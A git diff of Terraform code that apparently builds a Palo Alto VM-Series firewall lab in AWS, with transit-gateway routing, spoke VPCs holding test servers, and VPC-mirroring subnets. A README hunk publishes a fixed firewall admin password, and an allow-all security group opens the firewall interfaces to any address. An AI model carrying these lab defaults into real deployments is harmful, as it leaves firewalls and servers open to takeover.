+  description = "CIDR Address for Security VPC"
+  default     = "192.168.1.0/24"
+}
+
+variable vpc_security_subnet_private_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.101.0/24"
+}
+
+variable fw_ip_subnet_private_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.101.45"
+}
+
+variable fw_ip_subnet_public_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.1.45"
+}
+
+variable vpc_security_subnet_tgw_1 {
+  description = "CIDR Address for TGW Security VPC"
+  default     = "192.168.11.0/24"
+}
+#################
+# Mirror Subnets
+#################
+variable vpc_mirror_pub_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.51.0/24"
+}
+variable vpc_mirror_priv_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.52.0/24"
+}
+variable fw_ip_subnet_pub_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.51.45"
+}
+variable fw_ip_subnet_priv_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.52.45"
+}
+variable vpc_mirror_pub_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.61.0/24"
+}
+variable vpc_mirror_priv_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.62.0/24"
+}
+variable fw_ip_subnet_pub_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.61.45"
+}
+variable fw_ip_subnet_priv_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.62.45"
+}
+#############
+
+
+
+variable vpc_security_subnet_public_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.2.0/24"
+}
+
+variable vpc_security_subnet_private_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.102.0/24"
+}
+
+variable vpc_security_subnet_tgw_2 {
+  description = "CIDR Address for TGW Security VPC"
+  default     = "192.168.21.0/24"
+}
+
+variable fw_ip_subnet_private_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.102.45"
+}
+
+variable fw_ip_subnet_public_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.2.45"
+}
+
+variable spoke1_cidr {
+  description = "CIDR Address for Spoke1 VPC"
+  default     = "10.1.0.0/16"
+}
+
+variable spoke1_subnet {
+  description = "CIDR Address for Spoke1 Subnet"
+  default     = "10.1.1.0/24"
+}
+
+variable spoke1_subnet2 {
+  description = "CIDR Address for Spoke1 Subnet"
+  default     = "10.1.2.0/24"
+}
+
+variable spoke1_server {
+  description = "Server Address for Spoke1 Server"
+  default     = "10.1.1.45"
+}
+
+variable spoke1_server2 {
+  description = "Server Address for Spoke1 Server2"
+  default     = "10.1.2.45"
+}
+
+variable spoke2_cidr {
+  description = "CIDR Address for Spoke2 VPC"
+  default     = "10.2.0.0/16"
+}
+
+variable spoke2_subnet {
+  description = "CIDR Address for Spoke2 Subnet"
+  default     = "10.2.1.0/24"
+}
+
+variable spoke2_subnet2 {
+  description = "CIDR Address for Spoke2 Subnet"
+  default     = "10.2.2.0/24"
+}
+
+variable spoke2_server {
+  description = "Server Address for Spoke2 Server"
+  default     = "10.2.1.45"
+}
+
+variable spoke2_server2 {
+  description = "Server Address for Spoke2 Server2"
+  default     = "10.2.2.45"
+}
diff --git a/aws/TGW-VPC-Mirroring/vm-series/main.tf b/aws/TGW-VPC-Mirroring/vm-series/main.tf
new file mode 100644
index 00000000..12dbc9f7
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/vm-series/main.tf
@@ -0,0 +1,170 @@
+variable name {
+  description = "firewall instance name"
+}
+
+variable untrust_subnet_id {}
+variable untrust_security_group_id {}
+variable untrustfwip {}
+
+variable trust_subnet_id {}
+variable trust_security_group_id {}
+variable trustfwip {}
+
+variable management_subnet_id {}
+variable management_security_group_id {}
+
+variable bootstrap_profile {
+  default = ""
+}
+
+variable bootstrap_s3bucket {}
+
+variable tgw_id {}
+
+variable aws_region {}
+variable aws_key {}
+
+variable instance_type {
+  default = "m5.xlarge"
+}
+
+variable ngfw_license_type {
+  default = "payg2"
+}
+
+variable ngfw_version {
+  default = "9.0"
+}
+
+variable "license_type_map" {
+  type = "map"
+
+  default = {
+    "byol"  = "6njl1pau431dv1qxipg63mvah"
+    "payg1" = "6kxdw3bbmdeda3o6i1ggqt4km"
+    "payg2" = "806j2of0qy5osgjjixq9gqc6g"
+  }
+}
+
+data "aws_ami" "panw_ngfw" {
+  most_recent = true
+  owners      = ["aws-marketplace"]
+
+  filter {
+    name   = "owner-alias"
+    values = ["aws-marketplace"]
+  }
+
+  filter {
+    name   = "product-code"
+    values = ["${var.license_type_map[var.ngfw_license_type]}"]
+  }
+
+  filter {
+    name   = "name"
+    values = ["PA-VM-AWS-${var.ngfw_version}*"]
+  }
+}
+
+data "aws_region" "current" {
+  name = "${var.aws_region}"
+}
+
+resource "aws_network_interface" "eni-management" {
+  subnet_id         = "${var.management_subnet_id}"
+  security_groups   = ["${var.management_security_group_id}"]
+  source_dest_check = true
+
+  tags {
+    Name = "eni_${var.name}_management"
+  }
+}
+
+resource "aws_network_interface" "eni-trust" {
+  subnet_id         = "${var.trust_subnet_id}"
+  private_ips       = ["${var.trustfwip}"]
+  security_groups   = ["${var.trust_security_group_id}"]
+  source_dest_check = false
+
+  tags {
+    Name = "eni_${var.name}_trust"
+  }
+}
+
+output "eni-trust" {
+  value = "${aws_network_interface.eni-trust.id}"
+}
+
+resource "aws_eip" "eip-management" {
+  vpc               = true
+  network_interface = "${aws_network_interface.eni-management.id}"
+
+  tags {
+    Name = "eip_${var.name}_management"
+  }
+}
+
+resource "aws_network_interface" "eni-untrust" {
+  subnet_id         = "${var.untrust_subnet_id}"
+  private_ips       = ["${var.untrustfwip}"]
+  security_groups   = ["${var.untrust_security_group_id}"]
+  source_dest_check = false
+
+  tags {
+    Name = "eni_${var.name}_untrust"
+  }
+}
+
+resource "aws_eip" "eip-untrust" {
+  vpc               = true
+  network_interface = "${aws_network_interface.eni-untrust.id}"
+
+  tags {
+    Name = "eip_${var.name}_untrust"
+  }
+}
+
+resource "aws_instance" "instance-ngfw" {
+  disable_api_termination              = false
+  instance_initiated_shutdown_behavior = "stop"
+  iam_instance_profile                 = "${var.bootstrap_profile}"
+  user_data                            = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", var.bootstrap_s3bucket)))}"
+
+  ebs_optimized = true
+  ami           = "${data.aws_ami.panw_ngfw.image_id}"
+  instance_type = "${var.instance_type}"
+  key_name      = "${var.aws_key}"
+
+  monitoring = false
+
+  network_interface {
+    device_index         = 1
+    network_interface_id = "${aws_network_interface.eni-management.id}"
+  }
+
+  network_interface {
+    device_index         = 0
+    network_interface_id = "${aws_network_interface.eni-untrust.id}"
+  }
+
+  network_interface {
+    device_index         = 2
+    network_interface_id = "${aws_network_interface.eni-trust.id}"
+  }
+
+  tags {
+    Name = "${var.name}"
+  }
+}
+
+output "eip_untrust" {
+  value = "${aws_eip.eip-untrust.public_ip}"
+}
+
+output "eip_mgmt" {
+  value = "${aws_eip.eip-management.public_ip}"
+}
+
+output "instanceid" {
+  value = "${aws_instance.instance-ngfw.id}"
+}
diff --git a/aws/TGW-VPC-Mirroring/vpc_security.tf b/aws/TGW-VPC-Mirroring/vpc_security.tf
new file mode 100644
index 00000000..5ff14424
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/vpc_security.tf
@@ -0,0 +1,426 @@
+data "aws_availability_zones" "available" {}
+
+resource "aws_vpc" "vpc_security" {
+  cidr_block = "${var.vpc_security_cidr}"
+
+  tags {
+    Name = "vpc_security"
+  }
+}
+
+resource "aws_subnet" "vpc_security_public_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_public_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "vpc_security_public_1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_public_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_public_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "vpc_security_public_2"
+  }
+}
+#################
+#  Mirror Subnets
+#################
+resource "aws_subnet" "vpc_mirror_pub_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_mirror_pub_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "vpc_mirror_pub_1"
+  }
+}
+
+resource "aws_subnet" "vpc_mirror_priv_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_mirror_priv_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "vpc_mirror_priv_1"
+  }
+}
+resource "aws_subnet" "vpc_mirror_pub_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_mirror_pub_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "vpc_mirror_pub_2"
+  }
+}
+
+resource "aws_subnet" "vpc_mirror_priv_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_mirror_priv_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "vpc_mirror_priv_2"
+  }
+}
+###################
+
+resource "aws_subnet" "vpc_security_private_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_private_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "vpc_security_private_1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_private_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_private_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "vpc_security_private_2"
+  }
+}
+
+resource "aws_subnet" "vpc_security_tgw_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_tgw_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "vpc_security_tgw_1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_tgw_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_tgw_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "vpc_security_tgw_2"
+  }
+}
+
+resource "aws_route_table" "vpc_security_tgw_1" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "tgw_1"
+  }
+}
+
+resource "aws_route_table" "vpc_security_tgw_2" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "tgw_2"
+  }
+}
+
+resource "aws_route_table" "vpc_security_private_1" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "private_1"
+  }
+}
+
+resource "aws_route_table" "vpc_security_private_2" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "private_2"
+  }
+}
+
+resource "aws_route_table_association" "vpc_security_private_1" {
+  subnet_id      = "${aws_subnet.vpc_security_private_1.id}"
+  route_table_id = "${aws_route_table.vpc_security_private_1.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_private_2" {
+  subnet_id      = "${aws_subnet.vpc_security_private_2.id}"
+  route_table_id = "${aws_route_table.vpc_security_private_2.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_tgw_1" {
+  subnet_id      = "${aws_subnet.vpc_security_tgw_1.id}"
+  route_table_id = "${aws_route_table.vpc_security_tgw_1.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_tgw_2" {
+  subnet_id      = "${aws_subnet.vpc_security_tgw_2.id}"
+  route_table_id = "${aws_route_table.vpc_security_tgw_2.id}"
+}
+
+resource "aws_route" "vpc_security_tgw_1_0" {
+  route_table_id         = "${aws_route_table.vpc_security_tgw_1.id}"
+  destination_cidr_block = "0.0.0.0/0"
+  network_interface_id   = "${module.ngfw1.eni-trust}"
+}
+
+resource "aws_route" "vpc_security_tgw_1_1" {
+  route_table_id         = "${aws_route_table.vpc_security_tgw_1.id}"
+  destination_cidr_block = "10.0.0.0/8"
+  network_interface_id   = "${module.ngfw1.eni-trust}"
+}
+
+resource "aws_route" "vpc_security_tgw_2_0" {
+  route_table_id         = "${aws_route_table.vpc_security_tgw_2.id}"
+  destination_cidr_block = "0.0.0.0/0"
+  network_interface_id   = "${module.ngfw2.eni-trust}"
+}
+
+resource "aws_route" "vpc_security_tgw_2_1" {
+  route_table_id         = "${aws_route_table.vpc_security_tgw_2.id}"
+  destination_cidr_block = "10.0.0.0/8"
+  network_interface_id   = "${module.ngfw2.eni-trust}"
+}
+
+resource "aws_route" "vpc_security_trust_1_0" {
+  route_table_id         = "${aws_route_table.vpc_security_private_1.id}"
+  destination_cidr_block = "10.0.0.0/8"
+  transit_gateway_id     = "${aws_ec2_transit_gateway.tgw.id}"
+}
+
+resource "aws_route" "vpc_security_trust_2_0" {
+  route_table_id         = "${aws_route_table.vpc_security_private_2.id}"
+  destination_cidr_block = "10.0.0.0/8"
+  transit_gateway_id     = "${aws_ec2_transit_gateway.tgw.id}"
+}
+
+resource "aws_internet_gateway" "vpc_security_igw" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "vpc_securty_igw"
+  }
+}
+
+resource "aws_route" "vpc_security_default" {
+  route_table_id         = "${aws_vpc.vpc_security.default_route_table_id}"
+  destination_cidr_block = "0.0.0.0/0"
+  gateway_id             = "${aws_internet_gateway.vpc_security_igw.id}"
+}
+
+resource "aws_security_group" "allow_all" {
+  name        = "allow_all"
+  description = "Allow all inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_security.id}"
+}
+
+resource "aws_security_group_rule" "allow_all_ingress" {
+  type        = "ingress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.allow_all.id}"
+}
+
+resource "aws_security_group_rule" "allow_all_egress" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.allow_all.id}"
+}
+
+resource "aws_security_group" "allow_https_ssh" {
+  name        = "allow_https_ssh"
+  description = "Allow HTTPS and SSH inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_security.id}"
+}
+
+resource "aws_security_group_rule" "allow_ssh_ingress" {
+  type        = "ingress"
+  from_port   = 22
+  to_port     = 22
+  protocol    = "tcp"
+  cidr_blocks = ["${var.management_cidr}"]
+
+  security_group_id = "${aws_security_group.allow_https_ssh.id}"
+}
+
+resource "aws_security_group_rule" "allow_https_ingress" {
+  type        = "ingress"
+  from_port   = 443
+  to_port     = 443
+  protocol    = "tcp"
+  cidr_blocks = ["${var.management_cidr}"]
+
+  security_group_id = "${aws_security_group.allow_https_ssh.id}"
+}
+
+resource "aws_security_group_rule" "allow_all" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.allow_https_ssh.id}"
+}
+
+module "ngfw1" {
+  source = "./vm-series/"
+
+  name = "ngfw1"
+
+  aws_key = "${var.aws_key}"
+
+  trust_subnet_id         = "${aws_subnet.vpc_security_private_1.id}"
+  trust_security_group_id = "${aws_security_group.allow_all.id}"
+  trustfwip               = "${var.fw_ip_subnet_private_1}"
+
+  untrust_subnet_id         = "${aws_subnet.vpc_security_public_1.id}"
+  untrust_security_group_id = "${aws_security_group.allow_all.id}"
+  untrustfwip               = "${var.fw_ip_subnet_public_1 }"
+
+  management_subnet_id         = "${aws_subnet.vpc_security_public_1.id}"
+  management_security_group_id = "${aws_security_group.allow_https_ssh.id}"
+
+  bootstrap_profile  = "${aws_iam_instance_profile.bootstrap_profile.id}"
+  bootstrap_s3bucket = "${var.bootstrap_s3bucket}"
+
+  tgw_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  aws_region = "${var.aws_region}"
+}
+
+module "ngfw2" {
+  source = "./vm-series/"
+
+  name = "ngfw2"
+
+  aws_key = "${var.aws_key}"
+
+  trust_subnet_id         = "${aws_subnet.vpc_security_private_2.id}"
+  trust_security_group_id = "${aws_security_group.allow_all.id}"
+  trustfwip               = "${var.fw_ip_subnet_private_2}"
+
+  untrust_subnet_id         = "${aws_subnet.vpc_security_public_2.id}"
+  untrust_security_group_id = "${aws_security_group.allow_all.id}"
+  untrustfwip               = "${var.fw_ip_subnet_public_2 }"
+
+  management_subnet_id         = "${aws_subnet.vpc_security_public_2.id}"
+  management_security_group_id = "${aws_security_group.allow_https_ssh.id}"
+
+  bootstrap_profile  = "${aws_iam_instance_profile.bootstrap_profile2.id}"
+  bootstrap_s3bucket = "${var.bootstrap_s3bucket2}"
+
+  tgw_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  aws_region = "${var.aws_region}"
+}
+###################
+# VPC Mirror FWs
+###################
+module "ngfw3" {
+  source = "./vm-series/"
+
+  name = "ngfw3"
+
+  aws_key = "${var.aws_key}"
+
+  trust_subnet_id         = "${aws_subnet.vpc_mirror_priv_1.id}"
+  trust_security_group_id = "${aws_security_group.allow_all.id}"
+  trustfwip               = "${var.fw_ip_subnet_priv_1}"
+
+  untrust_subnet_id         = "${aws_subnet.vpc_mirror_pub_1.id}"
+  untrust_security_group_id = "${aws_security_group.allow_all.id}"
+  untrustfwip               = "${var.fw_ip_subnet_pub_1}"
+
+  management_subnet_id         = "${aws_subnet.vpc_mirror_pub_1.id}"
+  management_security_group_id = "${aws_security_group.allow_https_ssh.id}"
+
+  bootstrap_profile  = "${aws_iam_instance_profile.bootstrap_profile3.id}"
+  bootstrap_s3bucket = "${var.bootstrap_s3bucket3}"
+
+  tgw_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  aws_region = "${var.aws_region}"
+}
+module "ngfw4" {
+  source = "./vm-series/"
+
+  name = "ngfw4"
+
+  aws_key = "${var.aws_key}"
+
+  trust_subnet_id         = "${aws_subnet.vpc_mirror_priv_2.id}"
+  trust_security_group_id = "${aws_security_group.allow_all.id}"
+  trustfwip               = "${var.fw_ip_subnet_priv_2}"
+
+  untrust_subnet_id         = "${aws_subnet.vpc_mirror_pub_2.id}"
+  untrust_security_group_id = "${aws_security_group.allow_all.id}"
+  untrustfwip               = "${var.fw_ip_subnet_pub_2}"
+
+  management_subnet_id         = "${aws_subnet.vpc_mirror_pub_2.id}"
+  management_security_group_id = "${aws_security_group.allow_https_ssh.id}"
+
+
+  bootstrap_profile  = "${aws_iam_instance_profile.bootstrap_profile4.id}"
+  bootstrap_s3bucket = "${var.bootstrap_s3bucket4}"
+
+  tgw_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  aws_region = "${var.aws_region}"
+}
+#######################
+output "FW-1-MGMT" {
+  value = "Access the firewall MGMT via:  https://${module.ngfw1.eip_mgmt}"
+}
+output "FW-3-MGMT" {
+  value = "Access the firewall MGMT via:  https://${module.ngfw3.eip_mgmt}"
+}
+output "FW-4-MGMT" {
+  value = "Access the firewall MGMT via:  https://${module.ngfw4.eip_mgmt}"
+}
+output "Server-1-1_ngfw1_access" {
+  value = "Access Server 1-1 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 1001"
+}
+
+output "Server-1-2_ngfw1_access" {
+  value = "Access Server 1-2 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 1002"
+}
+
+output "Server-2-1_ngfw1_access" {
+  value = "Access Server 2-1 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 2001"
+}
+
+output "Server-2-2_ngfw1_access" {
+  value = "Access Server 2-2 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 2002"
+}
+
+output "FW-2-MGMT" {
+  value = "Access the firewall MGMT via:  https://${module.ngfw2.eip_mgmt}"
+}
+
+output "Server-1-1_ngfw2_access" {
+  value = "Access Server 1-1 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 1001"
+}
+
+output "Server-1-2_ngfw2_access" {
+  value = "Access Server 1-2 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 1002"
+}
+
+output "Server-2-1_ngfw2_access" {
+  value = "Access Server 2-1 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 2001"
+}
+
+output "Server-2-2_ngfw2_access" {
+  value = "Access Server 2-2 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 2002"
+}
diff --git a/aws/TGW-VPC-Mirroring/vpc_spoke/main.tf b/aws/TGW-VPC-Mirroring/vpc_spoke/main.tf
new file mode 100644
index 00000000..5d3673ed
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/vpc_spoke/main.tf
@@ -0,0 +1,191 @@
+variable vpc_spoke_cidr {
+  description = "CIDR Network Address for Spoke VPC"
+}
+
+variable vpc_spoke_subnet_cidr {
+  description = "CIDR Network Address for Spoke Subnet"
+}
+
+variable vpc_spoke_subnet2_cidr {
+  description = "CIDR Network Address for Spoke Subnet"
+}
+
+variable aws_tgw_id {
+  description = "AWS Transit Gateway ID"
+}
+
+variable aws_tgw_security_rtb_id {
+  description = "AWS Transit Gateway Route Table Id"
+}
+
+variable aws_tgw_spoke_rtb_id {
+  description = "AWS Transit Gateway Route Table Id"
+}
+
+variable pemkey {
+  description = "AWS pem KEY"
+}
+
+variable serverip {
+  description = "Ubuntu Server IP"
+}
+
+variable server2ip {
+  description = "Ubuntu Server2 IP"
+}
+
+variable servername {
+  description = "Ubuntu Server name"
+}
+
+variable server2name {
+  description = "Ubuntu Server2 name"
+}
+
+resource "aws_vpc" "vpc_spoke" {
+  cidr_block = "${var.vpc_spoke_cidr}"
+
+  tags {
+    Name = "vpc_spoke_${var.vpc_spoke_cidr}"
+  }
+}
+
+data "aws_availability_zones" "available" {}
+
+resource "aws_subnet" "primary" {
+  vpc_id            = "${aws_vpc.vpc_spoke.id}"
+  cidr_block        = "${var.vpc_spoke_subnet_cidr}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "vpc_spokeA_${var.vpc_spoke_subnet_cidr}"
+  }
+}
+
+resource "aws_subnet" "secondary" {
+  vpc_id            = "${aws_vpc.vpc_spoke.id}"
+  cidr_block        = "${var.vpc_spoke_subnet2_cidr}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "vpc_spokeB_${var.vpc_spoke_subnet2_cidr}"
+  }
+}
+
+resource "aws_security_group" "server_sg" {
+  name        = "server_sg"
+  description = "Allow select inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_spoke.id}"
+}
+
+resource "aws_security_group_rule" "allow_server_sg_ingress" {
+  type        = "ingress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["10.0.0.0/8", "192.168.0.0/16"]
+
+  security_group_id = "${aws_security_group.server_sg.id}"
+}
+
+resource "aws_security_group_rule" "allow_server_sg_egress" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.server_sg.id}"
+}
+
+resource "aws_route" "vpc_spoke_route_1" {
+  route_table_id         = "${aws_vpc.vpc_spoke.default_route_table_id}"
+  destination_cidr_block = "10.0.0.0/8"
+  transit_gateway_id     = "${var.aws_tgw_id}"
+}
+
+resource "aws_route" "vpc_spoke_route_2" {
+  route_table_id         = "${aws_vpc.vpc_spoke.default_route_table_id}"
+  destination_cidr_block = "192.168.0.0/16"
+  transit_gateway_id     = "${var.aws_tgw_id}"
+}
+
+resource "aws_route" "vpc_spoke_route_3" {
+  route_table_id         = "${aws_vpc.vpc_spoke.default_route_table_id}"
+  destination_cidr_block = "0.0.0.0/0"
+  transit_gateway_id     = "${var.aws_tgw_id}"
+}
+
+resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_spoke_attachment" {
+  vpc_id                                          = "${aws_vpc.vpc_spoke.id}"
+  subnet_ids                                      = ["${aws_subnet.primary.id}", "${aws_subnet.secondary.id}"]
+  transit_gateway_id                              = "${var.aws_tgw_id}"
+  transit_gateway_default_route_table_association = false
+  transit_gateway_default_route_table_propagation = false
+
+  tags {
+    Name = "tgw_attachment_spoke_${var.vpc_spoke_cidr}"
+  }
+}
+
+resource "aws_ec2_transit_gateway_route_table_association" "vpc_spoke_1" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}"
+  transit_gateway_route_table_id = "${var.aws_tgw_spoke_rtb_id}"
+}
+
+resource "aws_ec2_transit_gateway_route_table_propagation" "route_table_propagation" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}"
+  transit_gateway_route_table_id = "${var.aws_tgw_security_rtb_id}"
+}
+
+//Server in subnet
+data "aws_ami" "ubuntu" {
+  most_recent = true
+
+  filter {
+    name   = "name"
+    values = ["ubuntu/images/hvm-ssd/ubuntu-trusty-14.04-amd64-server-*"]
+  }
+
+  filter {
+    name   = "virtualization-type"
+    values = ["hvm"]
+  }
+
+  owners = ["099720109477"] # Canonical
+}
+
+resource "aws_instance" "web" {
+  ami             = "${data.aws_ami.ubuntu.id}"
+  instance_type   = "t3a.micro"
+  key_name        = "${var.pemkey}"
+  subnet_id       = "${aws_subnet.primary.id}"
+  private_ip      = "${var.serverip}"
+  security_groups = ["${aws_security_group.server_sg.id}"]
+
+  tags = {
+    Name = "${var.servername}"
+  }
+}
+
+resource "aws_instance" "web2" {
+  ami             = "${data.aws_ami.ubuntu.id}"
+  instance_type   = "t3a.micro"
+  key_name        = "${var.pemkey}"
+  subnet_id       = "${aws_subnet.secondary.id}"
+  private_ip      = "${var.server2ip}"
+  security_groups = ["${aws_security_group.server_sg.id}"]
+
+  tags = {
+    Name = "${var.server2name}"
+  }
+}
+
+//End Server
+output "vpc_id" {
+  value = "${aws_vpc.vpc_spoke.id}"
+}
+
+output "subnet_id" {
+  value = "${aws_subnet.primary.id}"
+}
diff --git a/aws/TGW-VPC-Mirroring/vpc_spokes.tf b/aws/TGW-VPC-Mirroring/vpc_spokes.tf
new file mode 100644
index 00000000..d0e66637
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/vpc_spokes.tf
@@ -0,0 +1,31 @@
+module "spoke1" {
+  source = "./vpc_spoke/"
+
+  pemkey                  = "${var.aws_key}"
+  serverip                = "${var.spoke1_server}"
+  server2ip               = "${var.spoke1_server2}"
+  servername              = "spoke1-server1"
+  server2name             = "spoke1-server2"
+  vpc_spoke_cidr          = "${var.spoke1_cidr}"
+  vpc_spoke_subnet_cidr   = "${var.spoke1_subnet}"
+  vpc_spoke_subnet2_cidr  = "${var.spoke1_subnet2}"
+  aws_tgw_id              = "${aws_ec2_transit_gateway.tgw.id}"
+  aws_tgw_spoke_rtb_id    = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}"
+  aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}"
+}
+
+module "spoke2" {
+  source = "./vpc_spoke/"
+
+  pemkey                  = "${var.aws_key}"
+  serverip                = "${var.spoke2_server}"
+  server2ip               = "${var.spoke2_server2}"
+  servername              = "spoke2-server"
+  server2name             = "spoke2-server2"
+  vpc_spoke_cidr          = "${var.spoke2_cidr}"
+  vpc_spoke_subnet_cidr   = "${var.spoke2_subnet}"
+  vpc_spoke_subnet2_cidr  = "${var.spoke2_subnet2}"
+  aws_tgw_id              = "${aws_ec2_transit_gateway.tgw.id}"
+  aws_tgw_spoke_rtb_id    = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}"
+  aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}"
+}
diff --git a/aws/TGW-VPC/README.md b/aws/TGW-VPC/README.md
index 985234d8..a0abade7 100644
--- a/aws/TGW-VPC/README.md
+++ b/aws/TGW-VPC/README.md
@@ -20,7 +20,7 @@
  3. Here is a link to setting up a creds file to access AWS: 
        https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html
  4. After deployment the firewall username and password are:
-         Username: paloalto
+         Username: admin
          Password: Pal0Alt0@123
 
  ```
diff --git a/aws/TGW-VPC/vm-series/main.tf b/aws/TGW-VPC/vm-series/main.tf
index 30f8cb7b..e519e14c 100644
--- a/aws/TGW-VPC/vm-series/main.tf
+++ b/aws/TGW-VPC/vm-series/main.tf
@@ -48,8 +48,7 @@ variable "license_type_map" {
 
 data "aws_ami" "panw_ngfw" {
   most_recent = true
-  include owners = [“aws-marketplace”]
-
+  owners = ["aws-marketplace"]
   filter {
     name   = "owner-alias"
     values = ["aws-marketplace"]
diff --git a/aws/VPC_Mirror_Target/README.md b/aws/VPC_Mirror_Target/README.md
new file mode 100644
index 00000000..69b1c1f2
--- /dev/null
+++ b/aws/VPC_Mirror_Target/README.md
@@ -0,0 +1,69 @@
+## 2 x VM-Series / NLB for VPC Mirror
+Terraform creates 2 VM-Series firewalls that are targets of an internal load balancer ready to receive VXLAN traffic from a VPC Mirroring configuration.   After deployment there are some steps that need to be done to setup VPC traffic Mirroring.  Those are documenented in screen shots below.
+
+### Overview
+* 1 x VPC 
+* 2 x VM-Series (Bundle2)
